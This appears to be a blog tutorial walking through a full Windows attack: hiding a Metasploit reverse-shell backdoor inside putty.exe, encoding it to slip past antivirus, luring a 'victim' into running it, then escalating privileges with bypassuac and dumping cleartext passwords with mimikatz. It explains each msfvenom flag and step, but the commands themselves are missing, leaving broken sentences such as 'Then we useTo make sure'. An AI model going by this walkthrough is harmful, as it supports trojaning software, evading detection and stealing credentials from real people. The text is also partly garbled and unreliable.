First of all we will create a payload(which we will later send to the victim for execution) but do you think somebody is going to click on a simple file which does nothing even on being executed and still not getting suspicious? The answer is simple,NO.
So here we will bind the file with a legitimate executable, which in turn is going to reduce the suspicious factor drastically. In this tutorial I’m using a very simple program (putty.exe) which just pops up "You just got Pwned!"(i know this clearly tips off the victim, but anyway this is just for the sake of the tutorial, you can use any .exe of your choice).
The troubles don’t end here, any AV(Anti Virus) is going to catch a msf payload. This is where crypting comes into play, in this tutorial I am using x86/shikata_na_gai encoder which although has been ranked as “excellent” in msfencode does not make the file FUD(Fully UnDetectable) but it does reduce the chances of getting caught depending on the AV which has been implemented on the victim machine. There are methods of making files FUD but then it will deviate us from our current aim.
Stuff you'll need
- Kali Linux / Backtrack
- Windows machine(target)
- A little bit of linux and msf knowledge (although i have tried to explain every single thing)
- Mimikatz (Download here)
Here first we change our directory to desktop then extract mimikatz(the tool to dump windows passwords in clear text) to a directory in desktop.
Here first we change our directory to desktop then We make a folder called “hax”, then we copy “putty.exe” from the desktop to the recently created directory, and then recheck using the “ls” command and then we again change directory to “hax”.Then we fire the next command:
This is because we are using “putty.exe” as a template in the next command, so it needs to be in place.
Where “LHOST” is the IP address and “LPORT” is the port(I’m using 4443, you can use any) of the attacking machine.
Here we are creating a backdoor and we use R – for raw output, this allows us to ‘pipe’ the code into the encoder, the | is the ‘pipe’. Then we use “–t” to specify the type of output(exe in this case), “-x” to mention the template(putty.exe in this case), we use the “-k” switch to retain the original functionality of the program in which the backdoor is to be inserted, “-o” to specify the output name, “-e” to specify the encoder to be used and finally “-c” to specify the number of times the file will be encoded.
Then we make it executable using the chmod command.
Meanwhile let us prepare to receive the shell.
Then we useTo make sure our settings are fine
Next we use
And upon execution of our backdoored “putty.exe” putty opens up just fine on the victim’s side.
But on our side the scene has changed a bit.
But now a process “bdoor_putty.exe” has been started on the victim’s pc, which means we will lose our session as soon as the victim closes our backdoored program. Therefore we will migrate to a more stable process(explorer.exe in this case).
Then let us create a folder called “mimi” where will upload all the contents mimikatz/Win32 (target machine is 32 bit).
Now lets fire up mimikatz.
Here “–H” switch was used to create the process hidden from view and “-i” was used to interact with the process after it is created.
Then we type the following command in mimikatz
Although the tool is written in French we can see that it does not have “all privileges”, which means we need to get system (system not administrator) level privileges.
So now to attain system level priviledges we use /post/windows/escalate/bypassuac
Now we go into the same directory where we had uploaded mimikatz and run the executable.
Now to get the password of logged in user we use the following command.
There are chances that a very big list might pop up, but you can easily distinguish the information of interest.
With this I end this tutorial, I hope it proved helpful for you. Please use the comment section wisely.